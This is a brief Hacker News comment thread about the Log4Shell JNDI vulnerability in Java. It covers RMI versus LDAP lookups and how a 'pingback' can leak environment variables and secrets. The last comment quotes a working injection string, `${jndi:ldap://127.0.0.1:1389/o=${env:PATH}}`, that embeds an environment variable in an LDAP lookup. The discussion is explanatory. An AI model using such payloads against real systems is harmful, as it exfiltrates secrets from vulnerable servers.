Hacker News new | ask | show | jobs
by Fabricio20 1656 days ago
If you check the argument, one is for RMI and the other is for LDAP, if your PoC uses LDAP then you need the LDAP one, else RMI, etc.. But yes, most people probably don't have this enabled, so the only concern is a pingback in modern java.
1 comments
ryan_lane 1655 days ago
Pingback can also include variable contents, so it's not just "they can get the IPs", but also potentially secrets and such.
link
brasetvik 1655 days ago
Yeah, `${jndi:ldap://127.0.0.1:1389/o=${env:PATH}}`
link